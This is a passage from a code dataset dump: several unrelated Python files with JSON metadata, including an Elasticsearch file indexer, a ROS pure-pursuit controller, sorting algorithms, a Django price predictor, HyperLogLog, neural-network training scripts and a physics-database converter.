search.query(bool_query)\n search = search.sort({'name._exact': 'asc'})\n res = search.execute()\n return res, search\n\n def get(self, system='designsafe.storage.default', path='/', name=''):\n \"\"\"Gets a file\"\"\"\n search = IndexedFile.search()\n term_system_query = Q(\n 'term',\n **{'system._exact': system}\n )\n term_path_query = Q('term', **{'path._exact': path})\n term_username_query = Q('term', **{'name._exact': name})\n bool_query = Q('bool')\n bool_query.must = [\n term_system_query,\n term_path_query,\n term_username_query\n ]\n bool_query.filter = self._pems_filter()\n search = search.query(bool_query)\n search = search.sort({'name._exact': 'asc'})\n res = search.execute()\n # logger.debug('search :%s', json.dumps(search.to_dict(), indent=2))\n return res, search\n\n @staticmethod\n def mimetype_lookup(file_object, debug_mode=True):\n \"\"\"\n Obtain a file's mimetype given an Agave response file object.\n\n When developing locally, (DEBUG==True) we can't assume that Corral is \n mounted so we have to download the file to memory in order to pass its \n content to python-magic. In staging/prod where Corral is mounted, we\n build up the absolute path of the file and pass that to python-magic to\n get the mimetype.\n\n :param agave.py.agve.AttrDict file_object: Agave file object to look up.\n :param bool debug_mode: True if Debug mode is active; False otherwise.\n\n :return string mimeType: The mimetype to index with Elasticsearch.\n\n \"\"\"\n if debug_mode == True:\n # In local dev, corral isn't mounted so we have to download the file to get its mimetype.\n return file_object.mimeType\n else:\n # In dev/prod, Corral is mounted and we can use the absolute path to get the mimetype.\n SYSTEM_ID_PATHS = [\n {'regex': r'^designsafe.storage.default$',\n 'path': '/corral-repl/tacc/NHERI/shared'},\n {'regex': r'^designsafe.storage.community$',\n 'path': '/corral-repl/tacc/NHERI/community'},\n {'regex': r'^designsafe.storage.published$',\n 'path': '/corral-repl/tacc/NHERI/published'},\n {'regex': r'^project\\-',\n 'path': '/corral-repl/tacc/NHERI/projects'}\n ]\n for mapping in SYSTEM_ID_PATHS:\n if re.search(mapping['regex'], file_object['system']):\n base_path = mapping['path']\n if mapping['regex'] == r'^project\\-':\n base_path += '/' + file_object['system'][8:] \n break\n\n filePath = base_path + file_object['path']\n if os.path.isdir(filePath):\n mimeType = 'text/directory'\n else:\n mimeType = magic.from_file(filePath, mime=True)\n\n return mimeType\n \n def index(self, file_object, pems):\n \"\"\"Indexes an Agave response file object (json) to an IndexedFile\"\"\"\n res, search = self.get(file_object.system,\n os.path.dirname(file_object.path.strip('/')),\n os.path.basename(file_object.path.strip('/')))\n if res.hits.total > 1:\n for doc in res[1:]:\n doc.delete(ignore=404)\n if res.hits.total >= 1:\n document = res[0]\n file_object.pop('_links')\n file_object.pop('permissions')\n document.update(**file_object)\n else:\n document = IndexedFile(\n name=os.path.basename(file_object.path.strip('/')),\n path=os.path.dirname(file_object.path.strip('/')) or '/',\n lastModified=file_object.lastModified.isoformat(),\n length=file_object.length,\n format=file_object.format,\n mimeType=FileManager.mimetype_lookup(file_object, settings.DEBUG),\n type=file_object.type,\n system=file_object.system,\n )\n if pems is None or not pems:\n document.permissions = [{\n 'username': self.username,\n 'permission': {\n 'read': True,\n 'write': True,\n 'execute': True\n }\n }]\n document.save()\n\n if pems:\n for pem in pems:\n pem.pop('_links', None)\n pem.pop('internalUsername', None)\n document.update(permissions=pems)\n return document\n","sub_path":"designsafe/apps/data/managers/elasticsearch.py","file_name":"elasticsearch.py","file_ext":"py","file_size_in_byte":7131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"242434867","text":"import numpy as np\nimport argparse\nimport skimage.transform\nfrom nn import pspnet, nn_utils, nn_processor\nfrom reader import dataReaderSegmentation\nimport cityscapes_reader, cityscapes_labels\n\n\n# define parameters\nBATCH_SIZE = 1\nDS_NAME = 'cityscapes'\nTILE_SIZE = (713, 713)\nNUM_CLASS = 19\nPAR_DIR = DS_NAME+'/res101'\nGPU = 0\nDATA_DIR = r'/hdd/cityscapes'\nRGB_TYPE = 'leftImg8bit'\nGT_TYPE = 'gtFine'\nRGB_EXT = RGB_TYPE\nGT_EXT = 'labelTrainIds'\nFORCE_RUN = True\nRES_DIR = r'/hdd6/Models/cityscapes/psp_github'\n\n\ndef read_flag():\n parser = argparse.ArgumentParser()\n parser.add_argument('--batch-size', default=BATCH_SIZE, type=int, help='batch size (10)')\n parser.add_argument('--ds-name', default=DS_NAME, type=str, help='dataset name')\n parser.add_argument('--tile-size', default=TILE_SIZE, type=tuple, help='tile size 5000')\n parser.add_argument('--num-classes', type=int, default=NUM_CLASS, help='# classes (including background)')\n parser.add_argument('--model-par-dir', type=str, default=PAR_DIR, help='parent directory name to save the model')\n parser.add_argument('--GPU', type=str, default=GPU, help=\"GPU used for computation.\")\n parser.add_argument('--data-dir', type=str, default=DATA_DIR, help='root directory of cityscapes')\n parser.add_argument('--rgb-type', type=str, default=RGB_TYPE, help='rgb type in cityscapes')\n parser.add_argument('--gt-type', type=str, default=GT_TYPE, help='gt type in cityscapes')\n parser.add_argument('--rgb-ext', type=str, default=RGB_EXT, help='rgb extension in their file names')\n parser.add_argument('--gt-ext', type=str, default=GT_EXT, help='gt extensions in their file names')\n parser.add_argument('--force-run', type=bool, default=FORCE_RUN, help='force run collection maker or not')\n parser.add_argument('--res-dir', type=str, default=RES_DIR, help='path to ckpt of Res101 model')\n\n flags = parser.parse_args()\n return flags\n\n\ndef make_general_id_map(pred):\n label_dict = {}\n for l in cityscapes_labels.labels:\n if l.trainId == 255:\n label_dict[l.trainId] = 0\n else:\n label_dict[l.trainId] = l.id\n\n h, w = pred.shape\n outputs = np.zeros((h, w), dtype=np.uint8)\n for j in range(h):\n for k in range(w):\n outputs[j, k] = label_dict[np.int(pred[j, k])]\n return outputs\n\n\ndef main(flags):\n nn_utils.set_gpu(GPU)\n\n # define network\n model = pspnet.PSPNet(flags.num_classes, flags.tile_size, batch_size=flags.batch_size)\n\n cm_train = cityscapes_reader.CollectionMakerCityscapes(flags.data_dir, flags.rgb_type, flags.gt_type, 'train',\n flags.rgb_ext, flags.gt_ext, ['png', 'png'],\n clc_name='{}_train'.format(flags.ds_name),\n force_run=False)\n cm_test = cityscapes_reader.CollectionMakerCityscapes(flags.data_dir, flags.rgb_type, flags.gt_type, 'val',\n flags.rgb_ext, flags.gt_ext, ['png', 'png'],\n clc_name='{}_valid'.format(flags.ds_name),\n force_run=False)\n cm_test.print_meta_data()\n resize_func_train = lambda img: skimage.transform.resize(img, flags.tile_size, mode='reflect')\n resize_func_test = lambda img: skimage.transform.resize(img, cm_test.meta_data['tile_dim'], order=0,\n preserve_range=True, mode='reflect')\n\n init_op, reader_op = dataReaderSegmentation.DataReaderSegmentation(\n flags.tile_size, cm_test.meta_data['file_list'], batch_size=flags.batch_size, random=False,\n chan_mean=cm_train.meta_data['chan_mean'], is_train=False, has_gt=True, gt_dim=1, include_gt=True,\n global_func=resize_func_train).read_op()\n estimator = nn_processor.NNEstimatorSegmentScene(\n model, cm_test.meta_data['file_list'], flags.res_dir, init_op, reader_op, ds_name='city_scapes',\n save_result_parent_dir='Cityscapes', gpu=flags.GPU, score_result=True, split_char='.',\n post_func=resize_func_test, save_func=make_general_id_map, ignore_label=(-1, 255))\n estimator.run(force_run=flags.force_run)\n\n\nif __name__ == '__main__':\n flags = read_flag()\n main(flags)\n","sub_path":"]tasks/2018.09.26.cityscapes/test_cityscapes_pspnet.py","file_name":"test_cityscapes_pspnet.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"98013062","text":"#!/usr/bin/env python\n\nimport rospy\nfrom race.msg import drive_param\nfrom nav_msgs.msg import Odometry\nimport math\nimport numpy as np\nfrom numpy import linalg as LA\nfrom tf.transformations import euler_from_quaternion, quaternion_from_euler\nimport csv\nimport os \nimport tf\nfrom nav_msgs.msg import Path\nfrom geometry_msgs.msg import PoseStamped\nimport copy\nfrom visualization_msgs.msg import Marker\n\n#############\n# CONSTANTS #\n#############\nglobal LOOKAHEAD_DISTANCE\nLOOKAHEAD_DISTANCE = 1.5 # meters\n\nglobal previous_goal\nprevious_goal = 0\n\nANGLE_LEVEL_1 = 10.0\nSPEED_LEVEL_1 = 1.5\nANGLE_LEVEL_2 = 20.0\nSPEED_LEVEL_2 = 1.0\nSPEED_LEVEL_3 = 0.5\n\n###########\n# GLOBALS #\n###########\n\n# Import waypoints.csv into a list (path_points)\ndirname = os.path.dirname(__file__)\nfilename = os.path.join(dirname, '../waypoints/wall_following_waypoints.csv')\n\nwith open(filename) as f:\n path_points = [tuple(line) for line in csv.reader(f)]\n\n# Turn path_points into a list of floats to eliminate the need for casts in the code below.\npath_points = [(float(point[0]), float(point[1]), float(point[2])) for point in path_points]\n \n# Publisher for 'drive_parameters' (speed and steering angle)\npub = rospy.Publisher('drive_parameters', drive_param, queue_size=1)\ngoal_pub = rospy.Publisher('desired_path', PoseStamped, queue_size=1)\nmarker_pub = rospy.Publisher('lookahead',Marker, queue_size=1)\n\nrospy.init_node('pure_pursuit')\ntf_listener = tf.TransformListener() #use tf tree for pose transforms\n\n#############\n# FUNCTIONS #\n#############\n \n# Computes the Euclidean distance between two 2D points p1 and p2.\ndef dist(p1, p2):\n return np.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n\n# Input data is PoseStamped message from topic /odom.\n# Runs pure pursuit and publishes velocity and steering angle.\n\n\ndef find_goal_point(x,y, yaw, LOOKAHEAD_DISTANCE):\n\n dist_arr= np.zeros(len(path_points))\n global previous_goal\n goal = previous_goal\n\n for i in range(len(path_points)):\n dist_arr[i] = dist((path_points[i][0],path_points[i][1]),(x,y))\n\n goal_arr = []\n for i in range(dist_arr.shape[0]):\n if dist_arr[i]>= LOOKAHEAD_DISTANCE- 0.3 and dist_arr[i] <= LOOKAHEAD_DISTANCE +0.3:\n goal_arr.append(i)\n\n for idx in goal_arr:\n vector1 = [path_points[idx][0]-x , path_points[idx][1]-y]\n vector2 = [np.cos(yaw), np.sin(yaw)]\n if abs(find_angle(vector1, vector2)) < np.pi/2:\n goal = idx\n break\n\n return goal\n\ndef transform_point(goal_point):\n goal_pose_msg = PoseStamped()\n goal_pose_msg.header.stamp = rospy.Time.now()\n goal_pose_msg.header.frame_id = \"map\"\n goal_pose_msg.pose.position.x = goal_point[0]\n goal_pose_msg.pose.position.y = goal_point[1]\n goal_pose_msg.pose.position.z = 0.0\n quaternion = quaternion_from_euler(0.0, 0.0, goal_point[2])\n goal_pose_msg.pose.orientation.x = quaternion[0]\n goal_pose_msg.pose.orientation.y = quaternion[1]\n goal_pose_msg.pose.orientation.z = quaternion[2]\n goal_pose_msg.pose.orientation.w = quaternion[3]\n\n tf_listener.waitForTransform(\"/map\", \"/base_link\", goal_pose_msg.header.stamp, rospy.Duration(0.5))\n goal_pose = tf_listener.transformPose(\"/base_link\", goal_pose_msg)\n # (trans,rot) = listener.lookupTransform('/map/', '/base_link/', rospy.Time(0))\n\n return goal_pose_msg, goal_pose\n\ndef find_angle( vector1, vector2):\n cos_comp = np.dot(vector1, vector2)\n sin_comp = np.linalg.norm(np.cross(vector2, vector2))\n return np.arctan2(sin_comp, cos_comp)\n\ndef callback(msg):\n\n x = msg.pose.pose.position.x \n y = msg.pose.pose.position.y\n\n qx = msg.pose.pose.orientation.x\n qy = msg.pose.pose.orientation.y\n qz = msg.pose.pose.orientation.z\n qw = msg.pose.pose.orientation.w\n\n pose_quaternion = np.array([qx, qy, qz, qw])\n yaw = tf.transformations.euler_from_quaternion(pose_quaternion)[2]\n\n # 2. Find the path point closest to the vehicle that is >= 1 lookahead distance from vehicle's current location.\n global LOOKAHEAD_DISTANCE\n\n goal = find_goal_point(x,y, yaw, LOOKAHEAD_DISTANCE)\n\n goal_point = path_points[goal]\n previous_goal = goal\n\n # # 3. Transform the goal point to vehicle coordinates. \n goal_pose_msg, goal_pose = transform_point(goal_point)\n\n # 4. Calculate the curvature = 1/r = 2x/l^2\n # The curvature is transformed into steering wheel angle and published to the 'drive_param' topic.\n abs_y = abs(goal_pose.pose.position.y)\n curvature = ((2.0*abs_y)/(LOOKAHEAD_DISTANCE**2))\n angle = np.arctan(0.3302*curvature)\n # angle = curvature \n\n\n if (goal_pose.pose.position.y < 0):\n angle = -angle #Right Steering\n else:\n angle = angle #Left Steering\n\n angle = np.clip(angle, -0.4189, 0.4189) # 0.4189 radians = 24 degrees because car can only turn 24 degrees max\n # clipping speeds and Lookahead\n degree_angle = math.degrees(angle)\n if abs(degree_angle) < ANGLE_LEVEL_1:\n vel = SPEED_LEVEL_1\n LOOKAHEAD_DISTANCE = 1.5\n elif ANGLE_LEVEL_1<= abs(degree_angle) and abs(degree_angle) < ANGLE_LEVEL_2:\n vel = SPEED_LEVEL_2\n LOOKAHEAD_DISTANCE = 1.0\n else:\n vel = SPEED_LEVEL_3\n LOOKAHEAD_DISTANCE = 0.5\n\n msg = drive_param()\n msg.velocity = vel\n msg.angle = angle\n pub.publish(msg)\n goal_pub.publish(goal_pose_msg)\n\n lookahead_marker = Marker()\n lookahead_marker.type = Marker.TEXT_VIEW_FACING\n lookahead_marker.header.frame_id = '/map'\n lookahead_marker.scale.z = 0.5\n lookahead_marker.color.a = 1\n lookahead_marker.color.r = 1.0\n lookahead_marker.color.g = 0.0\n lookahead_marker.color.b = 0.0 \n lookahead_marker.pose.position.x = 0.0\n lookahead_marker.pose.position.y = 4.0\n rospy.set_param('LOOKAHEAD_DISTANCE', LOOKAHEAD_DISTANCE) \n multiline_str = 'LOOKAHEAD_DISTANCE: %s'%str(LOOKAHEAD_DISTANCE) + ' \\n' + 'VELOCITY: %s'%str(vel)\n\n lookahead_marker.text = multiline_str \n marker_pub.publish(lookahead_marker)\n\nif __name__ == '__main__':\n rospy.Subscriber('/pf/pose/odom', Odometry, callback, queue_size=1)\n rospy.spin()\n\n","sub_path":"final_race_lab/virtualfastkeyboardfurious_final_race/scripts/pure_pursuit.py","file_name":"pure_pursuit.py","file_ext":"py","file_size_in_byte":6139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"594469023","text":"\nimport sorting_algorithm.basic_helpers as helpers\nimport sorting_algorithm.sorting_test as data\nimport math\n\n\ndef selection_sort(alist):\n \"\"\"\n First, find the smallest item in the array, and exchange it with the first entry. Then, find the next smallest item\n and exchange it with the second entry. Continue in this way until the entire array is sorted. This method is called\n selection sort because it works by repeatedly selecting the smallest remaining item.\n :param alist:\n :return:\n \"\"\"\n\n if not alist:\n return []\n if len(alist) <= 1:\n return alist\n\n for i in range(len(alist)):\n for j in range(i+1, len(alist)):\n if not helpers.less_than(alist[i], alist[j]):\n helpers.exch(alist, i, j)\n\n return alist\n\n\ndef insertion_sort(alist):\n \"\"\"\n The algorithm that people often use to sort bridge hands is to consider the cards one at a time, inserting each\n into its proper place among those already considered (keeping them sorted). In a computer implementation,\n we need to make space for the current item by moving larger items one position to the right,\n before inserting the current item into the vacated position.\n :param alist:\n :return:\n \"\"\"\n\n if not alist:\n return []\n\n for i in range(1, len(alist)):\n for j in (range(i)):\n if helpers.less_than(alist[i], alist[j]):\n helpers.exch(alist, i, j)\n\n return alist\n\n\ndef shell_sort(alist):\n \"\"\"\n The idea is to rearrange the array to give it the property that taking every hth entry (starting anywhere) yields\n a sorted sequence. Such an array is said to be h-sorted\n\n Here, we use N / 2 for gap sequence.\n :param alist:\n :return:\n \"\"\"\n if not alist:\n return False\n\n if len(alist) <= 1:\n return True\n\n N = len(alist)\n h = math.floor(N / 2) # gap\n\n while h >= 1:\n # do h-sorting\n size = math.ceil(N / h)\n for g in range(h): # each group\n for i in range(g + h, g + h * size, h):\n if i < N:\n for j in range(g, i, h):\n if helpers.less_than_or_equal(alist[i], alist[j]):\n helpers.exch(alist, i, j)\n\n h = math.floor(h / 2)\n\n return True\n\n\n# print(data.TEST_A)\n# shell_sort(data.TEST_A)\n# print(data.TEST_A)\n\n","sub_path":"sorting_algorithm/elementory_sorting.py","file_name":"elementory_sorting.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"85592042","text":"from django.shortcuts import render\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef home(request):\n return render(request,'home.html')\n\ndef predict(request):\n return render(request,'predict.html')\n\ndef result(request):\n df = pd.read_csv('C:/Users/pc lenovo/Downloads/USA_Housing.csv')\n df.drop('Address', inplace=True, axis=1)\n X = df[['Avg. Area Income', 'Avg. Area House Age', 'Avg. Area Number of Rooms',\n 'Avg. Area Number of Bedrooms', 'Area Population']]\n y = df['Price']\n X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=.30)\n model=LinearRegression()\n model.fit(X_train,y_train)\n var1 = float(request.GET['n1'])\n var2 = float(request.GET['n2'])\n var3 = float(request.GET['n3'])\n var4 = float(request.GET['n4'])\n var5 = float(request.GET['n5'])\n pred = model.predict(np.array([var1,var2,var3,var4,var5]).reshape(1,-1))\n pred = round(pred[0])\n price = \"the predicted price is $\"+str(pred)\n \n return render(request,'predict.html', {\"result2\":price})\n","sub_path":"HousePricePrediction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"618554422","text":"'''\nCreated on 28.12.2016\n\n@author: Timo\n'''\nimport random\n\nclass HyperLogLog:\n def __init__(self,L):\n self.l = L\n self.m = 2**L\n #values for alpha_m {16: 0.75207,32: 0.77308,64: 0.78356}\n self.alpha = 0.78356\n self.registers = [float('-inf')] * self.m\n \n def add(self,x):\n index = random.randint(0,self.m-1)\n lead_zeros = leading_zeros()\n self.registers[index] = max(self.registers[index],lead_zeros)\n \n def size(self):\n temp = 0\n for reg in self.registers:\n temp = temp + 2**(-1*reg)\n Z = temp**(-1)\n E = self.alpha*(self.m**2)*Z\n return E\n \ndef leading_zeros():\n index = 1\n rand = 0\n while rand == 0:\n rand = random.random()\n if rand >= 0.5:\n rand = 1\n else:\n rand = 0\n index += 1\n return index\n ","sub_path":"hyperloglog.py","file_name":"hyperloglog.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"21472006","text":"from __future__ import absolute_import, division, print_function\n\nimport tensorflow as tf\nimport numpy as np\n\nimport vgg\n\nTRAIN_BATCH_SIZE = 128\nNUM_CLASSES = 10\nNUM_EPOCHS = 10\nVALIDATION_SIZE = 5000\nEVAL_BATCH_SIZE = 128\n\ndef main():\n \"\"\"Train vgg16 on mnist\n\n Note: In order to have compatible dimensions, you must\n comment out the first three pooling layers in Vgg\n \"\"\"\n mnist = tf.keras.datasets.mnist\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n x_train, x_test = x_train / 255.0, x_test / 255.0\n\n x_eval = x_train[:VALIDATION_SIZE, ...]\n y_eval = y_train[:VALIDATION_SIZE]\n x_train = x_train[VALIDATION_SIZE:, ...]\n y_train = y_train[VALIDATION_SIZE:]\n\n model = tf.estimator.Estimator(\n model_fn=vgg.vgg_model_fn,\n params={\n \"num_classes\": NUM_CLASSES,\n \"data_format\": \"channels_last\"\n }\n )\n\n model.train(\n input_fn=lambda:vgg.input_fn(x_train, y_train, TRAIN_BATCH_SIZE)\n )\nif __name__==\"__main__\":\n main()\n","sub_path":"models/vgg/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"132463999","text":"#!/usr/bin/env python3\n# Viterbi Ave minimization problem\n# based on skeleton code by D. Crandall, March 2019\n\nimport numpy as np\n\n# problem definition\nhome_elevations = [10, 12, 15, 1, 25, 0, 1, 16, 16, 18]\nN = 10 # cost of raising/lowering a home 1 foot\nM = 1 # constact factor in cost of staircases\n\npossible_elevations = range(0, 26)\nhome_count = len(home_elevations)\n\n# left_messages[i] is the message *to* the i-th home, from the i+1-th home\n# right_messages[i] is the message to the i-th home, from the i-1-th home\nleft_messages = np.zeros((home_count, 26),)\nright_messages = np.zeros((home_count, 26),)\n\n\ndef D(my_elevation, i):\n return N*abs(home_elevations[i]-my_elevation) ## done\n\ndef V(my_elevation, neighbor_elevation):\n return M*(my_elevation-neighbor_elevation)*(my_elevation-neighbor_elevation) ## done\n\nfor iteration in range(0, home_count*2):\n new_left_messages = np.zeros((home_count, 26),)\n new_right_messages = np.zeros((home_count, 26),)\n\n for i in range(0, home_count-1):\n for neighbor_elevation in possible_elevations:\n new_right_messages[i+1][neighbor_elevation] = np.min([(D(x,i)+V(x,neighbor_elevation)+right_messages[i][x]) for x in possible_elevations]) ## done\n\n for i in range(1, home_count):\n for neighbor_elevation in possible_elevations:\n new_left_messages[i-1][neighbor_elevation] = np.min([(D(x,i)+V(x,neighbor_elevation)+left_messages[i][x]) for x in possible_elevations]) ## done\n\n np.copyto(left_messages, new_left_messages)\n np.copyto(right_messages, new_right_messages)\n\n# finally, every home chooses its best elevation based on the last set of neighbors and its own D() cost\nnew_elevations = [0] * home_count\nfor i in range(0, len(home_elevations)):\n new_elevations[i] = np.argmin([(right_messages[i][my_elevation] + left_messages[i][my_elevation] + D(my_elevation, i)) for my_elevation in possible_elevations ] )\n\n# calculate the cost of the final answer\ncost = (new_elevations[0] - home_elevations[0])*N\nfor i in range(1, len(home_elevations)):\n cost += abs(new_elevations[i] - home_elevations[i])*N + M*(new_elevations[i] - new_elevations[i-1])**2\n\nprint(\"Problem inputs:\")\nprint(\" Cost of raising/lowering yard: $%d/foot\" % N)\nprint(\" Cost of staircase : height squared x $%d\" % M)\nprint(\" Current yard elevations : \" + str(home_elevations))\nprint(\"\")\nprint(\"Solution:\")\nprint(\" Min cost to install sidewalk : $%d\" % cost)\nprint(\" New yard elevations : \" + str(new_elevations))\n\n\n\n","sub_path":"module9_stereo_beleif_propogation/pyton.py","file_name":"pyton.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"490995770","text":"#!/usr/bin/env python3\n\n\"\"\"\n.. module:: convert\n :synopsis: used to create info.txt and the .txt files.\n\n\"\"\"\nimport sys\nimport os\nimport argparse\n\nargparser = argparse.ArgumentParser(description = \n'create info.txt, txname.txt, twiki.txt and sms.py')\nargparser.add_argument ('-utilsPath', '--utilsPath', \nhelp = 'path to the package smodels_utils',\\\ntype = str )\nargparser.add_argument ('-smodelsPath', '--smodelsPath', \nhelp = 'path to the package smodels_utils',\\\ntype = str )\nargs = argparser.parse_args()\n\nif args.utilsPath:\n utilsPath = args.utilsPath\nelse:\n databaseRoot = '../../../'\n sys.path.append(os.path.abspath(databaseRoot))\n from utilsPath import utilsPath\n utilsPath = databaseRoot + utilsPath\nif args.smodelsPath:\n sys.path.append(os.path.abspath(args.smodelsPath))\n\nsys.path.append(os.path.abspath(utilsPath))\nfrom smodels_utils.dataPreparation.inputObjects import MetaInfoInput,DataSetInput\nfrom smodels_utils.dataPreparation.databaseCreation import databaseCreator\nfrom smodels_utils.dataPreparation.massPlaneObjects import x, y, z\n\n#+++++++ global info block ++++++++++++++\ninfo = MetaInfoInput('ATLAS-SUSY-2016-15')\ninfo.url \t\t = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/PAPERS/SUSY-2016-15/'\ninfo.sqrts \t\t = 13\ninfo.lumi \t\t = 36.1\ninfo.prettyName = '0L stop'\ninfo.private \t = False\ninfo.arxiv \t\t = 'https://arxiv.org/abs/1709.04183'\ninfo.contact \t = 'atlas-phys-susy-conveners@cern.ch'\ninfo.publication = 'https://link.springer.com/article/10.1007/JHEP12(2017)085'\n\n#+++++++ dataset block ++++++++++++++\ndataset = DataSetInput('data')\ndataset.setInfo(dataType = 'upperLimit', dataId = None)\n\nT2tt \t\t\t\t\t\t\t= dataset.addTxName('T2tt')\nT2tt.checked \t\t\t\t\t= 'False'\nT2tt.constraint \t\t\t\t= '[[[t]],[[t]]]'\nT2tt.conditionDescription \t\t= None\nT2tt.condition \t\t\t\t\t= None\nT2tt.massConstraint\t\t\t\t= [['dm >= 169.0'], ['dm >= 169.0']]\nT2tt.source \t\t\t\t\t= 'ATLAS'\n#+++++++ next txName block ++++++++++++++\nT2ttoff \t\t\t\t\t\t= dataset.addTxName('T2ttoff')\nT2ttoff.checked \t\t\t\t= 'False'\nT2ttoff.constraint \t\t\t\t= '[[[b, W]],[[b, W]]]'\nT2ttoff.conditionDescription \t= None\nT2ttoff.condition \t\t\t\t= None\nT2ttoff.massConstraint \t\t\t= [['80 <= dm < 169.0'], ['80 <= dm < 169.0']]\nT2ttoff.source \t\t\t\t\t= 'ATLAS'\n#+++++++ next mass plane block ++++++++++++++\nT2bbffff\t\t\t\t\t\t= dataset.addTxName('T2bbffff')\nT2bbffff.checked\t\t\t\t= 'False'\nT2bbffff.constraint\t\t\t\t= \"9./4.*[[['b', 'jet','jet']],[['b', 'jet','jet']]]\"\nT2bbffff.conditionDescription \t= None\nT2bbffff.condition\t\t\t\t= None\nT2bbffff.source\t\t\t\t\t= 'ATLAS'\nT2bbffff.massConstraint\t\t\t= [['dm < 80'], ['dm < 80']]\n#+++++++ next mass plane block ++++++++++++++\nT2tt_1 \t\t\t\t\t\t\t= T2tt.addMassPlane(2*[[x, y]])\nT2tt_1.figure \t\t\t\t\t= 'figaux_12'\nT2tt_1.figureUrl \t\t\t\t= 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/PAPERS/SUSY-2016-15/figaux_12.png'\nT2tt_1.dataUrl\t\t\t\t\t= 'https://www.hepdata.net/record/ins1623207?version=7&table=X-section U.L. direcTT'\nT2tt_1.setSources(dataLabels\t= ['expExclusion', 'obsExclusion', 'upperLimits'],\n \tdataFiles\t= ['orig/ExpectedexclusioncontourdirectTT.csv', 'orig/ObservedexclusioncontourdirectTT.csv', 'orig/X-sectionU.L.direcTT.csv'],\n\t\t\t\t\tcoordinates = [ {x: 0, y: 1, 'value': None}, {x: 0, y: 1, 'value': None}, {x : 1, y: 0, 'value' :2} ],\n \t\tunits \t= [ None, None, 'fb' ],\n \tdataFormats\t= ['csv', 'csv', 'csv'])\n\nT2ttoff.addMassPlane(T2tt_1)\nT2bbffff.addMassPlane(T2tt_1)\n\n\n\n\ndatabaseCreator.create()\n\n\n","sub_path":"smodels-database/13TeV/ATLAS/ATLAS-SUSY-2016-15/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"260923476","text":"import numpy as np\n\nk_i = np.array([0.20, 0.22, 0.78, 0.80,\n 0.30, 0.32, 0.96, 1.00,\n 1.20, 1.43, 1.80, 1.88,\n 0.40, 0.50, 3.24, 3.50,\n 0.38, 0.43, 2.24, 4.90,\n 0.40, 0.44, 1.22, 4.00,\n 0.39, 0.44, 0.96, 1.80,\n 0.39, 0.45, 0.80, 1.60,\n 0.40, 0.47, 0.60, 1.60], dtype=float)\n\nc_i = np.linspace(0, 160, 9)\nt_i = np.array([16, 25, 50, 75], dtype=float)\n\n\ndef phi_ij(c_ii, c_j, t_ii, t_j):\n return np.sqrt(1 + (c_ii - c_j)**2 + (t_ii - t_j)**2)\n\n\ndef calculate_aj():\n b_ij = np.zeros((36, 36), dtype=float)\n\n i = 0\n for c_j_val in c_i:\n for t_j_val in t_i:\n j = 0\n for c_i_val in c_i:\n for t_i_val in t_i:\n b_ij[i, j] = phi_ij(c_i_val, c_j_val, t_i_val, t_j_val)\n j += 1\n\n i += 1\n\n a_ij = np.linalg.solve(b_ij, k_i)\n return a_ij\n\n\ndef tk_ct(a_ij, c, t):\n i = 0\n function_value = 0\n for c_j in c_i:\n for t_j in t_i:\n function_value += a_ij[i] * phi_ij(c, c_j, t, t_j)\n i += 1\n \n return function_value\n\n\ndef check():\n a_ij = calculate_aj()\n k_test = np.zeros(36, dtype=float)\n i = 0\n for c in c_i:\n for t in t_i:\n k_test[i] = tk_ct(a_ij, c, t)\n i += 1\n\n print(k_test)\n","sub_path":"infiltration.py","file_name":"infiltration.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"598455982","text":"\"\"\"\nExtracts features into drafts/features.csv\n\"\"\"\n\nfrom datetime import datetime, timedelta\n\nimport pandas as pd\n\nimport db\nfrom util import Timed, features_csv_filename\n\npd.set_option('display.expand_frame_repr', False)\n\n# players\nres = db.session.query(db.Player.id, db.Player).all()\nlocal = dict(res)\n\nGLDB = {}\n\n\ndef load_gldb_if_empty(date):\n \"\"\"\n Public function, only call this one!\n\n :param date: date to reference for GLDB\n :return:\n \"\"\"\n if len(GLDB) == 0:\n with Timed(\"loading GLDB\"):\n _load_gldb(date)\n\n\ndef _load_gldb(date):\n end = date\n gls = db.session.query(db.GameLog) \\\n .join(db.Game) \\\n .filter(db.Game.date < end) \\\n .order_by(db.Game.date.desc()) \\\n .all()\n GLDB[\"all\"] = gls\n GLDB[\"players\"] = {}\n\n # .filter(db.GameLog.zeroes == False) \\\n # n_zeroes = db.session.query(db.GameLog) \\\n # .filter(db.GameLog.zeroes == True) \\\n # .count()\n # print(\"Filtered {} game logs out for having all zeroes\".format(n_zeroes))\n\n for gl in gls:\n name = gl.player.name\n GLDB[\"players\"][name] = GLDB[\"players\"].get(name, []) + [gl]\n\n for name, gls in GLDB[\"players\"].items():\n GLDB[\"players\"][name] = sorted(gls, key=lambda gl: gl.game.date, reverse=True)\n\n 